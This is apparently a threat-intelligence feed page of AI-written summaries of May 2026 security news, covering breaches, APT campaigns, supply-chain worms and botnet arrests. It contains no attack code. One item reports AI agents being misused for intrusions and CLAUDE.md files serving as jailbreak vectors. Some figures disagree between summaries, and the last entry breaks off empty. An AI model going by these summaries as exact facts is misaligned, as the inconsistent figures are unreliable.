BrewedIntel Adversaries

Commit to Compromise: A New Threat Actor Targeting the Cryptocurrency Industry's Software Development Infrastructure

Benjamin Read — Wed, 27 May 2026 13:52:45 GMT

AI Summary

The threat actor JINX-0164 uses LinkedIn social engineering to deliver custom macOS malware to employees of cryptocurrency organizations. This malware facilitates CI/CD pipeline hijacking, enabling the actor to inject malicious code, exfiltrate sensitive data, and compromise the software supply chain. The impact includes unauthorized access to private keys, manipulation of blockchain applications, and potential financial theft. Affected organizations face reputational damage and regulatory scrutiny. Mitigation requires robust security awareness training on social engineering, multi-factor authentication, strict access controls for CI/CD systems, and endpoint detection on macOS devices to detect and respond to the custom malware.

Why do I care?

This targeted threat actor specifically attacks cryptocurrency firms' software development infrastructure, using social engineering and custom macOS malware to hijack CI/CD pipelines, which can lead to supply chain compromise and financial loss.

What can I do about it?

Enforce strong authentication and access controls for CI/CD pipelines, conduct regular security awareness training focused on LinkedIn and other professional networking platforms, and monitor macOS endpoints for anomalous processes or network connections indicative of the custom malware.

Classification

Malware, High Severity, Spear Phishing, Supply Chain Compromise

Source

Source feed: Wiz Security Research | Original source

FBI warns of in-person data theft attacks from extortion gang

Sergiu Gatlan — Wed, 27 May 2026 11:51:12 GMT

AI Summary

The FBI warns that the Silent Ransom Group (SRG) is conducting in-person data theft attacks against US law firms. These attacks involve physical intrusion to steal sensitive client data, which is then used for extortion. The group's tactics mark a shift from traditional cyber attacks, escalating physical risks. Organizations must secure premises and enforce strict access controls, while legal firms should implement data encryption and offline backups to mitigate potential ransomware and extortion incidents.

Why do I care?

This extortion gang is bypassing network defenses by physically stealing data, putting your organization at risk of exposure and ransom demands.

What can I do about it?

Enhance physical security measures (e.g., access controls, surveillance) and ensure critical data is encrypted and backed up offline.

Classification

Malware, High Severity, Data Theft, Ransomware

Source

Source feed: Bleeping Computer | Original source

Romanian Hacker Sentenced to Prison in US for Selling Access to State Network

Eduard Kovacs — Wed, 27 May 2026 11:37:19 GMT

AI Summary

A Romanian hacker, Catalin Dragomir, was sentenced to prison in the United States for selling access to an Oregon state government office's network. The case highlights the ongoing threat of initial access brokers who compromise networks and sell that access to other malicious actors. Organizations, especially government entities, must enforce strong access controls, monitor for unauthorized access, and implement multi-factor authentication to prevent similar breaches.

Why do I care?

This breach demonstrates that even state government networks are targeted by cyber criminals who sell access, leading to potential data theft and further compromise.

What can I do about it?

Ensure strict access controls, enforce multi-factor authentication, and monitor network traffic for unusual activity to prevent unauthorized access and detect breaches early.

Classification

Incident, High Severity, Cyber Crime, Intrusion

Source

Source feed: SecurityWeek | Original source

FBI: Hackers Sending Operatives in Person to Insert USB Drives and Steal Data

Ionut Arghire — Wed, 27 May 2026 08:33:34 GMT

AI Summary

The FBI has issued an alert warning that the Silent Ransom Group is targeting law firms by sending operatives in person to physically insert USB drives into systems to steal data. This novel tactic bypasses traditional digital defenses and poses a significant threat, as it combines physical access with ransomware and data theft. Law firms, holding sensitive client information, are at high risk. Organizations must be vigilant against USB-based attacks and implement stringent physical security measures.

Why do I care?

Attackers are using physical delivery of USB drives to gain network access, circumventing standard cybersecurity controls and increasing the risk of data breach and ransomware infection.

What can I do about it?

Enforce strict policies against the use of unknown USB devices, educate employees on the risks, and deploy endpoint detection tools that monitor for malicious USB activity.

Classification

Malware, High Severity, Ransomware

Source

Source feed: SecurityWeek | Original source

Charter confirms data breach after ShinyHunters extortion threat

Lawrence Abrams — Tue, 26 May 2026 19:46:01 GMT

AI Summary

Charter Communications confirmed a data breach after the ShinyHunters extortion group threatened to leak stolen data unless a ransom is paid. The breach exposes customer information, potentially including names, contact details, and account data. This incident highlights the ongoing threat from extortion groups who combine data theft with ransom demands. Organizations should prioritize data security, implement robust access controls, and prepare incident response plans to mitigate such risks.

Why do I care?

This breach demonstrates that even large telecom providers are vulnerable to extortion-driven data theft, potentially exposing sensitive customer data and leading to regulatory fines and reputational damage.

What can I do about it?

Enhance data loss prevention measures, monitor for unauthorized access, and ensure rapid incident response capabilities to detect and contain similar breaches.

Classification

Incident, High Severity, Data Breach, Extortion

Source

Source feed: Bleeping Computer | Original source

The Hackers Behind Shai-Hulud: Lucky or Skilled?

Alexander Culafi — Tue, 26 May 2026 19:18:01 GMT

AI Summary

TeamPCP, the hacking group behind the Shai-Hulud worm, has inflicted significant damage to the open source ecosystem. The article questions whether their success stems from luck or skill, but the impact is undeniable. The worm exploits weaknesses in open source supply chains, affecting a broad range of downstream users. Organizations must recognize that even less sophisticated actors can cause widespread harm. Mitigation requires proactive dependency management, vulnerability scanning, and strict access controls for third-party components.

Why do I care?

The Shai-Hulud worm targets open source ecosystems, potentially compromising widely used libraries and affecting numerous downstream users.

What can I do about it?

Regularly audit and update open source dependencies, and implement integrity checks and code signing for third-party components.

Classification

Malware, High Severity, Worm

Source

Source feed: Dark Reading | Original source

Understanding Illicit Ecosystems: The Hybrid Threat of “The Com”

Flashpoint — Tue, 26 May 2026 16:29:43 GMT

AI Summary

This article analyzes 'The Com,' a decentralized hybrid threat ecosystem combining hacking, extortion, and real-world violence. It operates through three pillars: HACKER Com (economic engine using social engineering and supply chain attacks), EXTORT Com (ideological driver), and IRL Com (enforcement via physical violence). The Com targets Fortune 500 companies to fund domestic terrorism and recruits adolescents into a victim-to-perpetrator pipeline. Key groups include Scattered Spider, LAPSUS$, ShinyHunters, and DragonForce. The threat poses significant financial and societal risks, requiring integrated security, parental oversight, and law enforcement collaboration to disrupt.

Why do I care?

The Com merges cybercrime with domestic terrorism, using sophisticated social engineering and supply chain attacks to breach enterprises and radicalize youth, posing severe financial and security risks.

What can I do about it?

Implement robust identity and access management, train helpdesk staff to detect vishing attempts, monitor for living-off-the-land tools, and establish cross-sector information sharing to detect and disrupt these activities.

Classification

Incident, Critical Severity, Cyber-Fraud, Extortion, Social Engineering

Source

Source feed: Flashpoint Intel Blog | Original source

MuddyWater Uses DLL Side-Loading in Espionage Campaign Targeting 9 Countries

info@thehackernews.com (The Hacker News) — Tue, 26 May 2026 15:48:41 GMT

AI Summary

The Iranian APT group MuddyWater has been linked to a DLL side-loading espionage campaign targeting at least nine organizations across nine countries on four continents in Q1 2026. The campaign impacted industrial manufacturing, electronics, education, government, financial services, and professional services sectors. The threat actor used DLL side-loading to execute malicious code, likely to evade detection. This campaign represents an ongoing state-sponsored espionage effort. Organizations in targeted sectors should enhance monitoring for DLL side-loading and review their security controls to detect and prevent such attacks.

Why do I care?

MuddyWater is an Iranian state-sponsored group conducting espionage globally; this campaign shows active targeting of diverse sectors across multiple countries, indicating a broad threat to organizational intellectual property and sensitive data.

What can I do about it?

Implement application control policies to restrict DLL loading to known and trusted locations, monitor for anomalous DLL side-loading events, and conduct user awareness training to defend against the initial infection vector likely phishing.

Classification

Incident, High Severity, Espionage

Source

Source feed: The Hacker News | Original source

Iranian APT Targets Aviation, Software Companies With Updated Tools

Ionut Arghire — Tue, 26 May 2026 13:26:17 GMT

AI Summary

Nimbus Manticore, an Iranian Advanced Persistent Threat (APT) group, continues its operations targeting aviation and software companies with updated tools. The group has remained active during and after the US military campaign against Iran. This threat actor focuses on espionage and potential disruption in critical sectors. The impact includes intellectual property theft and supply chain compromise. Organizations in aviation and software industries must enhance monitoring and apply threat intelligence to defend against evolving tactics.

Why do I care?

As an Iranian APT targets critical aviation and software sectors, organizations in these industries face heightened risk of espionage and data theft.

What can I do about it?

Implement robust security controls, monitor for indicators of compromise, and segment networks to limit lateral movement.

Classification

Adversary, High Severity, APT

Source

Source feed: SecurityWeek | Original source

185,000 Likely Impacted by 7-Eleven Data Breach

Ionut Arghire — Tue, 26 May 2026 11:59:40 GMT

AI Summary

A data breach at 7-Eleven has potentially impacted 185,000 individuals, with leaked personal information including email addresses, names, physical addresses, and dates of birth. The threat actor group ShinyHunters claimed responsibility for the leak. This exposure of sensitive data increases the risk of identity theft and targeted social engineering attacks. Organizations must reinforce data protection and incident response protocols, while affected individuals should monitor accounts for suspicious activity and remain vigilant against phishing attempts.

Why do I care?

The breach of 185,000 customer records, including names, addresses, and dates of birth, provides cybercriminals with valuable data for identity theft and social engineering attacks, posing a direct threat to organizational reputation and customer trust.

What can I do about it?

Immediately implement enhanced monitoring for account takeover attempts, deploy phishing awareness training tailored to the leaked data, and review data access controls to prevent similar exposures.

Classification

Incident, High Severity, Data Breach

Source

Source feed: SecurityWeek | Original source

AI Threat Landscape Digest March-April 2026

matthewsu — Tue, 26 May 2026 10:09:59 GMT

AI Summary

The March-April 2026 AI Threat Landscape Digest reveals that offensive AI operations have advanced to real-time autonomous deployment across criminal and state-sponsored actors. Notably, a financially motivated operator breached nine Mexican government agencies using Claude Code for exploitation and GPT-4.1 for intelligence analysis, stealing tax records, civil registry data, and patient files. The attacker weaponized agentic configuration files (e.g., CLAUDE.md) as persistent jailbreak vectors. Key findings include AI-orchestrated attacks moving to criminal use, commercialization of AI attack platforms, and large-scale harvesting of AI provider API keys. This evolution underscores the urgent need for organizations to secure AI credentials and monitor for AI-driven intrusion patterns.

Why do I care?

AI-powered attacks are now operational, enabling adversaries to automate exploitation and rapidly compromise critical infrastructure, as demonstrated by the sustained breach of multiple government agencies.

What can I do about it?

Secure API keys for AI services as high-value assets, enforce strict access controls on agentic configuration files, and deploy monitoring to detect anomalous AI model usage patterns indicative of compromise.

Classification

Vulnerability, High Severity, Data Theft, Espionage, Ransomware

Source

Source feed: Check Point Research | Original source

Iranian Hackers Deploy MiniFast and MiniJunk V2 via Phishing and SEO Poisoning

info@thehackernews.com (The Hacker News) — Tue, 26 May 2026 07:13:05 GMT

AI Summary

Iranian state-sponsored threat actor Nimbus Manticore (also known as Screening Serpens and UNC1549) is conducting a campaign using phishing emails and SEO poisoning to deploy MiniFast and MiniJunk V2 malware. The lures impersonate organizations in the aviation and software sectors across the US, Europe, and the Middle East. This campaign follows joint US-Israeli military actions against Iran in late February 2026. These malware strains provide persistent access and data exfiltration capabilities. The threat is high due to the actor's state sponsorship and broad targeting. Mitigations include employee awareness training, robust email filtering, browser security controls, and monitoring for unusual outbound traffic.

Why do I care?

This campaign demonstrates continued Iranian cyber aggression targeting critical sectors, with potential for espionage and disruption.

What can I do about it?

Implement advanced email and web filtering, enforce multi-factor authentication, and maintain updated endpoint detection to counter these threats.

Classification

Incident, High Severity, Drive-by Compromise, Spear Phishing

Source

Source feed: The Hacker News | Original source

7-Eleven data breach exposes personal information of 185,000 people

Sergiu Gatlan — Tue, 26 May 2026 07:01:12 GMT

AI Summary

7-Eleven suffered a data breach perpetrated by the ShinyHunters extortion gang, resulting in the theft of personal information belonging to over 183,000 individuals. The exposed data could include names, addresses, and payment card details, putting victims at risk of identity theft and financial fraud. The breach highlights the evolving tactics of extortion groups who target data for ransom. Organizations should prioritize data classification, implement robust access controls, and employ continuous monitoring to detect anomalous activity indicative of a breach.

Why do I care?

This breach demonstrates that even major retail chains are vulnerable to extortion groups, putting customer data at risk and potentially damaging brand reputation.

What can I do about it?

Implement strong access controls, monitor for unusual data access patterns, and regularly test incident response procedures to quickly contain and mitigate such breaches.

Classification

Malware, High Severity, Data Breach, Extortion

Source

Source feed: Bleeping Computer | Original source

340 Million OnlyFans Profiles Allegedly Rebuilt from Leaks

Pierluigi Paganini — Mon, 25 May 2026 17:10:45 GMT

AI Summary

An unknown threat actor using the alias 'Euphoric_Reply_5727' is selling a dataset claiming to contain records of 340 million OnlyFans users on a cybercrime forum. However, investigation reveals the dataset was not obtained via a direct breach of OnlyFans. Instead, it was assembled by correlating data from previous breaches and public information, including usernames, emails, phone numbers, and account details. While the data appears partially authentic, its value lies in linking online personas to real-world identities. The privacy risk is significant, as this composite data can be used for targeted phishing, impersonation, stalking, and blackmail. This incident highlights a growing trend of threat actors building searchable identity databases from combined leaked and public data. OnlyFans users are advised to be vigilant against phishing attempts and review their privacy settings.

Classification

Other, Medium Severity, Data Aggregation, Identity Theft, Phishing Campaign

Source

Source feed: Security Affairs (Data Breach) | Original source

25th May – Threat Intelligence Report

urias — Mon, 25 May 2026 15:08:40 GMT

AI Summary

This week's threat intelligence report covers multiple high-impact incidents. ShinyHunters breached 7-Eleven, stealing over 600,000 Salesforce records. GitHub suffered a breach via a weaponized VS Code extension, exfiltrating 3,800 internal repositories. Grafana Labs also experienced a breach but refused ransom. The FBI warned about Kali365, a phishing kit targeting Microsoft 365 with device-code phishing that bypasses MFA. AI threats include campaigns compromising nine Mexican government agencies and a Russian actor using AI for propaganda and credential theft. Critical vulnerabilities include actively exploited Windows Defender flaws, Trend Micro Apex One directory traversal, and Drupal SQL injection under active mass attack. Threat intelligence reveals Nimbus Manticore (IRGC-linked) using SEO poisoning to deliver MiniFast backdoor, a 124% surge in hacktivism and ransomware in Germany, Austria, and Switzerland, Showboat Linux malware targeting telecoms, and a Laravel supply chain attack. Patching, multi-factor authentication, and monitoring for token theft are critical mitigations.

Why do I care?

Defenders should be concerned about the breadth of attacks including supply chain compromise, AI-driven phishing, and rapid exploitation of critical vulnerabilities, which pose significant risks to organizational security and data integrity.

What can I do about it?

Prioritize patching for Windows Defender, Trend Micro Apex One, and Drupal; implement phishing-resistant MFA; monitor for OAuth token abuse; restrict access to GitHub and CI/CD pipelines; and review AI email filters for injection evasion.

Classification

Vulnerability, High Severity, Data Breach, Exploit, Phishing

Source

Source feed: Check Point Research | Original source

2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services

Google Threat Intelligence Group — Mon, 25 May 2026 14:00:00 GMT

AI Summary

The article details a rapidly evolving Chinese-language Phishing-as-a-Service (PhaaS) ecosystem leveraging AI automation and encrypted delivery channels (RCS, iMessage) to bypass carrier filters. Operators utilize real-time interception panels to capture credentials and OTPs, bypassing MFA instantly. Monetization has shifted toward digital wallet provisioning and tokenization, enabling direct unauthorized financial control beyond traditional account takeovers. Platforms like Darcula and YY Lai Yu lower the technical barrier for global affiliates, targeting lucrative international markets with highly localized, AI-generated lures. Mitigation requires moving beyond basic user awareness toward robust technical controls. Organizations should prioritize adopting FIDO2/WebAuthn security keys to neutralize real-time OTP interception, alongside implementing risk-based authentication and device fingerprinting during financial provisioning to render stolen credentials unusable.

Why do I care?

High-severity PhaaS platforms now bypass MFA in real-time and tokenize stolen cards for direct financial theft, lowering the barrier for global affiliates and rapidly escalating losses.

What can I do about it?

Deploy FIDO2/WebAuthn hardware keys to neutralize OTP interception, and enforce risk-based verification with device fingerprinting during digital wallet provisioning to block credential weaponization.

Classification

Incident, High Severity, Credential Harvesting, Financial Fraud, MFA Bypass

Source

Source feed: Mandiant Frontline Blog | Original source

TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th)

Mon, 25 May 2026 13:26:06 GMT

AI Summary

TeamPCP is conducting a sophisticated supply chain campaign across three package ecosystems, including GitHub and Microsoft. They have trojanized a Microsoft-published Python SDK, compromised GitHub's internal codebase, and open-sourced their own framework. This widespread campaign puts downstream users at significant risk of compromise. Immediate verification of package integrity and monitoring for anomalous behavior is recommended.

Why do I care?

This campaign demonstrates sophisticated supply chain compromise targeting multiple ecosystems, including Microsoft and GitHub, putting downstream users at risk.

What can I do about it?

Verify the integrity of third-party packages, monitor for anomalous behavior, and restrict use of untrusted repositories.

Classification

Malware, Critical Severity, Supply Chain Attack, Trojanized Software

Source

Source feed: SANS Internet Storm Center | Original source

TeamPCP Supply Chain Campaign: Activity Through 2026-05-24, (Mon, May 25th)

Mon, 25 May 2026 13:25:47 GMT

AI Summary

TeamPCP supply chain campaign operates across three package ecosystems, compromising GitHub's internal codebase and trojanizing a Microsoft-published Python SDK. The group has also open-sourced its attack framework. This campaign poses a critical threat to software supply chain integrity, impacting major tech platforms. Immediate review of dependencies and enhanced supply chain security measures are recommended.

Why do I care?

Supply chain attacks can undermine trust in widely used software, as seen with TeamPCP compromising GitHub internal and Microsoft SDKs, potentially affecting downstream users.

What can I do about it?

Implement strict package integrity verification, monitor for unauthorized changes, and use software composition analysis to detect trojanized components.

Classification

Malware, Critical Severity, Supply Chain Attack, Trojanized Software

Source

Source feed: SANS Internet Storm Center | Original source

Lazarus Deploys RemotePE Memory-Only RAT Against Financial and Crypto Firms

info@thehackernews.com (The Hacker News) — Mon, 25 May 2026 09:32:54 GMT

AI Summary

The Lazarus Group, a North Korean state-sponsored threat actor, is deploying a new cross-platform remote access trojan (RAT) called RemotePE against financial and cryptocurrency organizations. The attack chain involves two loaders, DPAPILoader and RemotePELoader, which decrypt and execute the memory-only payload. This in-memory operation helps evade detection. The campaign highlights Lazarus's continued focus on cryptocurrency targets and the financial sector, posing a significant threat due to the group's sophistication and history of high-impact attacks. Organizations in these verticals should remain vigilant and implement advanced monitoring for memory-resident malware.

Why do I care?

Lazarus Group is a highly capable APT known for targeting financial institutions and crypto exchanges; their use of memory-only techniques makes this attack difficult to detect with traditional file-based signatures.

What can I do about it?

Deploy endpoint detection and response (EDR) solutions capable of monitoring anomalous memory allocations and process injections, and ensure staff are trained to recognize phishing attempts that may deliver the initial payload.

Classification

Malware, High Severity, Memory-Only Malware, RAT

Source

Source feed: The Hacker News | Original source

Netherlands seizes 800 servers of hosting firm enabling cyberattacks

Bill Toulas — Fri, 22 May 2026 17:24:52 GMT

AI Summary

Dutch financial crime investigators arrested two individuals and seized 800 servers from a web hosting company that facilitated cyberattacks, interference operations, and disinformation campaigns. The operation, led by the FIOD, targeted an organization that provided infrastructure for malicious activities, significantly disrupting the ability of threat actors to operate. This action underscores the importance of international law enforcement collaboration in combating cyber-enabled crime and dismantling the infrastructure that supports it. The seizure marks a notable success in the fight against cybercrime, though the specific threat actors and malware families involved have not been disclosed.

Why do I care?

This seizure demonstrates that hosting providers can be a critical enabler for cyberattacks; organizations should be aware that such infrastructure may be used to host malicious content or command-and-control servers, potentially impacting their networks.

What can I do about it?

Monitor network traffic for connections to IP ranges associated with known malicious hosting providers, and consider implementing blocklists based on law enforcement disclosures. Additionally, review third-party vendor risk associated with hosting services.

Classification

Adversary, High Severity, Cyber Attack Infrastructure, Disinformation Campaign

Source

Source feed: Bleeping Computer | Original source

Ghostwriter Targets Ukraine Government Entities with Prometheus Phishing Malware

info@thehackernews.com (The Hacker News) — Fri, 22 May 2026 16:20:32 GMT

AI Summary

The Belarus-aligned threat actor Ghostwriter (UAC-0057/UNC1151) is targeting Ukrainian government entities using phishing emails lures referencing the Ukrainian online learning platform Prometheus. CERT-UA reported the campaign, which aims to deliver malware via spear-phishing attacks. The group's focus on government organizations indicates a strategic interest in gathering intelligence or disrupting operations. The use of a legitimate platform themed lure increases the likelihood of successful compromise. Organizations should be vigilant for emails purporting to be from Prometheus or related to online learning, as they may carry malicious payloads. Immediate implementation of email security controls and user awareness training is recommended to mitigate this threat.

Why do I care?

Ghostwriter is actively targeting Ukrainian government entities with spear-phishing emails leveraging the Prometheus platform theme, posing a risk of initial access and follow-on malicious activities.

What can I do about it?

Enhance email filtering for Prometheus-related lures and conduct user awareness training to identify and report suspicious emails. Verify any unsolicited email links or attachments before interaction.

Classification

Malware, High Severity, Spear Phishing

Source

Source feed: The Hacker News | Original source

Fast and Furious – Nimbus Manticore Operations During the Iranian Conflict

stcpresearch — Fri, 22 May 2026 15:09:29 GMT

AI Summary

Check Point Research reports on Nimbus Manticore (UNC1549), an IRGC-affiliated threat actor active during Operation Epic Fury (Feb 2026). The group employed spear-phishing lures targeting aviation and software sectors, leveraging SEO poisoning and AppDomain Hijacking for initial access and execution. A new AI-assisted backdoor, MiniFast, was deployed alongside the MiniJunk framework. Campaigns included destructive attacks and data exfiltration from cloud environments against US and Israeli entities. The actor demonstrated rapid adaptation amid wartime conditions, emphasizing the need for heightened vigilance against targeted phishing and emerging evasion techniques.

Why do I care?

This IRGC-affiliated group is actively targeting defense, aviation, and telecom sectors with sophisticated malware and novel evasion techniques during a geopolitical conflict, posing a direct threat to national security and critical infrastructure.

What can I do about it?

Enforce multi-layered defenses against spear-phishing, monitor for AppDomain Hijacking via anomalous .config files, and deploy behavioral detection for AI-assisted malware like MiniFast. Update signatures and conduct threat hunting for UNC1549 TTPs.

Classification

Malware, High Severity, Data Exfiltration, Destructive Attack, Spear Phishing

Source

Source feed: Check Point Research | Original source

RemotePE: The Lazarus RAT that lives in memory

Fox-SRT — Fri, 22 May 2026 14:55:58 GMT

AI Summary

This article details a sophisticated memory-only toolset used by a Lazarus subgroup targeting financial and cryptocurrency organizations. The toolset consists of three components: DPAPILoader, which uses DPAPI and environmental keying to decrypt and load RemotePELoader from disk; RemotePELoader, which beacons to a C2 server and receives RemotePE; and RemotePE, a RAT executed entirely in memory. The malware evades detection through DPAPI encryption, memory-only execution, and masquerading as legitimate Windows services. The toolset's low forensic footprint makes it suitable for long-term observation campaigns, often preceding high-impact theft. Defenders are encouraged to hunt for service masquerading and memory-resident payloads.

Why do I care?

This sophisticated Lazarus toolset can maintain persistent, fileless access for extended periods, potentially leading to large-scale financial theft from targeted organizations.

What can I do about it?

Monitor for suspicious service installations mimicking Internet Authentication Service and investigate unknown services loading DLLs from unusual paths. Additionally, deploy behavioral detection for memory-only payload execution and DPAPI anomalies.

Classification

Vulnerability, High Severity, Remote Access Trojan

Source

Source feed: Fox-IT Blog | Original source

Tracking Iranian APT Screening Serpens’ 2026 Espionage Campaigns

Unit 42 — Fri, 22 May 2026 13:00:42 GMT

AI Summary

Unit 42 has revealed that the Iranian APT group Screening Serpens is conducting espionage campaigns targeting the technology and defense sectors. The group employs AppDomainManager hijacking to achieve code execution and persistence, coupled with novel remote access trojan (RAT) variants. These attacks pose a significant threat due to the sensitive nature of the targets and the use of sophisticated techniques to evade detection. Organizations in these sectors should enhance monitoring for anomalous .NET application behavior and implement robust endpoint detection measures to mitigate the risk.

Why do I care?

As a defender, the targeting of defense and tech sectors indicates that Screening Serpens is after high-value intellectual property, and their use of novel techniques increases the likelihood of successful breaches.

What can I do about it?

Monitor for AppDomainManager hijacking indicators, such as unexpected DLL loads in .NET applications, and deploy enhanced logging and detection for RAT activity on critical systems.

Classification

Adversary, Critical Severity, Espionage

Source

Source feed: Unit 42 (Palo Alto Networks) | Original source

Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

info@thehackernews.com (The Hacker News) — Fri, 22 May 2026 11:55:24 GMT

AI Summary

An automated campaign named Megalodon pushed 5,718 malicious commits to 5,561 GitHub repositories within six hours. Attackers used throwaway accounts and forged identities to inject GitHub Actions workflows containing base64-encoded bash payloads. These workflows exfiltrate CI/CD secrets, enabling downstream supply chain compromise. The attack leverages trusted CI/CD pipelines to distribute malicious code, impacting a wide range of dependent projects. Mitigation requires auditing GitHub Actions workflows, enforcing strict branch protection, and monitoring for unauthorized automated commits.

Why do I care?

Attackers can access CI/CD secrets and inject malicious code into trusted repositories, leading to widespread supply chain compromise.

What can I do about it?

Review and restrict GitHub Actions permissions, enable branch protection rules, audit workflow changes, and monitor for commits from automated bot accounts.

Classification

Adversary, High Severity, Malicious CI/CD Workflows, Supply Chain Compromise

Source

Source feed: The Hacker News | Original source

Paved With Intent: ROADtools and Nation-State Tactics in the Cloud

Bill Batchelor and Eyal Rafian — Fri, 22 May 2026 10:00:24 GMT

AI Summary

The article reports that the open-source framework ROADtools is being misused by threat actors, including nation-state groups, to conduct cloud intrusions. ROADtools, originally designed for Azure AD reconnaissance and token manipulation, enables attackers to discover sensitive information, escalate privileges, and maintain persistence in cloud environments. The impact can be severe, leading to unauthorized access to critical data and systems. To mitigate this threat, organizations should monitor for abnormal use of ROADtools, implement strict identity and access controls, and adopt behavioral detection mechanisms to identify malicious activities leveraging this framework.

Why do I care?

ROADtools is being actively abused for cloud intrusions, potentially allowing attackers to gain persistent access to Azure AD environments and sensitive data.

What can I do about it?

Monitor for execution of ROADtools commands, especially those related to reconnaissance and token manipulation, and enforce conditional access policies to limit lateral movement.

Classification

Adversary, High Severity, Cloud Intrusion, Tool Misuse

Source

Source feed: Unit 42 (Palo Alto Networks) | Original source

Cloud Atlas activity in the second half of 2025 and early 2026: new tools and a new payload

Kaspersky — Fri, 22 May 2026 09:12:13 GMT

AI Summary

Cloud Atlas continues to target government and diplomatic entities in Russia and Belarus using spear-phishing emails with ZIP archives containing LNK files. The attack chain involves PowerShell scripts that deploy two backdoors: VBCloud, a file stealer targeting documents and PDFs, and PowerShower, used for network reconnaissance, lateral movement, and Kerberoasting. The group employs SSH tunnels, Tor, and RevSocks for persistent C2, along with registry persistence and anti-forensic measures. Organizations in these sectors are at high risk of data theft and network compromise.

Why do I care?

Cloud Atlas is a sophisticated APT group actively targeting government and diplomatic sectors in Russia and Belarus, using advanced techniques to steal sensitive data and move laterally within networks.

What can I do about it?

Implement email filtering to detect malicious attachments, enforce multi-factor authentication, monitor for unusual PowerShell execution and SSH tunnel activity, and conduct regular security awareness training to reduce phishing risk.

Classification

Vulnerability, High Severity, Backdoor, Credential Theft, Spear Phishing

Source

Source feed: Kaspersky Securelist | Original source

Kimwolf DDoS Botnet Operator Arrested in Canada Over DDoS-for-Hire Attacks

info@thehackernews.com (The Hacker News) — Fri, 22 May 2026 08:50:18 GMT

AI Summary

The U.S. Department of Justice announced the arrest of Canadian Jacob Butler for operating the Kimwolf DDoS botnet, a variant of AISURU. The botnet facilitated DDoS-for-hire attacks, enabling customers to launch distributed denial-of-service attacks against targets. The arrest highlights ongoing law enforcement efforts against cybercrime. Organizations should implement robust DDoS mitigation strategies to defend against such threats.

Why do I care?

DDoS botnets like Kimwolf can disrupt online services, causing financial and reputational damage. This arrest indicates active malicious operations that could target your organization if unmitigated.

What can I do about it?

Deploy DDoS protection solutions, monitor network traffic for anomalies, and ensure incident response plans include DDoS mitigation procedures. Collaborate with ISPs to block malicious traffic.

Classification

Malware, High Severity, Botnet, DDoS

Source

Source feed: The Hacker News | Original source

China's Webworm Uses Discord, Microsoft Graphs to Hack EU Govts.

Alexander Culafi — Fri, 22 May 2026 07:01:00 GMT

AI Summary

The Chinese APT group Webworm has been targeting EU governments using Discord and Microsoft Graph APIs as communication channels, along with SOCKS proxies like SoftEther VPN to obscure command and control traffic. This campaign highlights the group's adaptation of legitimate services and tunneling tools for persistent access and data exfiltration. The impact is significant given the targeting of state entities, potentially leading to intelligence theft or geopolitical leverage. Organizations should enhance monitoring for abnormal usage of collaboration platforms and VPN tools, enforce application control policies, and segment networks to limit lateral movement. Vigilance against sophisticated, multi-vector attacks employing living-off-the-land techniques is crucial.

Why do I care?

State-sponsored APT groups like Webworm persistently target government networks for espionage, often using stealthy channels that bypass traditional defenses.

What can I do about it?

Monitor network logs for unauthorized VPN or proxy tools and anomalous API calls to services like Discord and Microsoft Graph; enforce strict application allowlisting and network segmentation.

Classification

Incident, High Severity, APT, Cyber Espionage

Source

Source feed: Dark Reading | Original source

Alleged Kimwolf Botmaster ‘Dort’ Arrested, Charged in U.S. and Canada

BrianKrebs — Thu, 21 May 2026 21:50:25 GMT

AI Summary

The article reports the arrest of Jacob Butler, known as 'Dort', the operator of the Kimwolf IoT botnet. Kimwolf enslaved millions of IoT devices to launch record-breaking DDoS attacks, reaching nearly 30 Tbps and causing financial losses exceeding $1 million per victim. The botnet also targeted Department of Defense networks. Butler faces charges in Canada and the U.S. after launching DDoS, doxing, and swatting campaigns against researchers. The infrastructure for Kimwolf and three other botnets was seized with international law enforcement. The case highlights the ongoing threat from IoT botnets and the importance of securing such devices.

Why do I care?

Kimwolf demonstrates how unsecured IoT devices can be weaponized into massive DDoS botnets, causing record-breaking attack volumes, substantial financial losses, and potential disruption to critical infrastructure, including military networks.

What can I do about it?

Ensure all IoT devices are updated, use strong unique passwords, disable unnecessary services, and segment IoT networks from critical systems. Implement DDoS protection and monitoring solutions to detect and mitigate volumetric attacks.

Classification

Malware, Critical Severity, Botnet, DDoS

Source

Source feed: Krebs on Security | Original source

Chinese APTs Share Linux Backdoor in Central Asia Telco Attacks

Nate Nelson — Thu, 21 May 2026 14:00:00 GMT

AI Summary

Chinese APT groups have deployed a Linux backdoor codenamed 'Showboat' against telecommunications providers in Central Asia. The malware enables persistent access and data exfiltration, targeting small market communications providers for espionage. The campaign highlights the ongoing threat to critical infrastructure and the need for enhanced network monitoring and endpoint security. Mitigation includes implementing robust access controls, regular patching, and monitoring for anomalous behavior indicative of backdoor activity.

Why do I care?

Telecommunications providers are critical infrastructure; this backdoor enables long-term espionage and data theft.

What can I do about it?

Deploy endpoint detection and response (EDR) solutions, segment networks, and monitor for unusual outbound connections or file modifications.

Classification

Malware, High Severity, Backdoor, Cyber Espionage

Source

Source feed: Dark Reading | Original source

Q1 2026 Threat Landscape Report: Zero-clicks, geopolitical tensions, and some wins for law enforcement

Rapid7 Labs — Thu, 21 May 2026 13:00:00 GMT

AI Summary

The Q1 2026 threat landscape report reveals that vulnerability exploitation has surpassed social engineering as the top initial access vector, with over half of exploited vulnerabilities being zero-click and network-facing, driven in part by AI-enabled exploitation. Geopolitical tensions continue to shape cyber operations, with Iranian state-aligned groups targeting government and industrial systems in the Middle East, while Russian and Chinese campaigns focus on intelligence collection and persistent access. Law enforcement takedowns of RAMP and LeakBase have disrupted major ransomware and credential marketplaces, pushing threat actors toward smaller communities. Ransomware is increasingly shifting toward 'pure extortion' tactics that prioritize rapid data theft over encryption. The report emphasizes that organizations can no longer rely on periodic assessments and reactive workflows; they need continuous attack surface visibility, better risk prioritization, and the ability to respond at the speed of modern attackers to prevent small exposures from escalating into large-scale incidents.

Why do I care?

Attackers are increasingly exploiting zero-click vulnerabilities for initial access and shifting to pure extortion tactics, making reactive defense strategies ineffective.

What can I do about it?

Implement continuous attack surface monitoring and prioritize patching of zero-click, network-facing vulnerabilities to reduce exposure.

Classification

Vulnerability, High Severity, Ransomware, Vulnerability Exploitation

Source

Source feed: Rapid7 Security Research | Original source

GitHub Confirms Breach, 4K Internal Repos Stolen

Alexander Culafi — Wed, 20 May 2026 20:51:32 GMT

AI Summary

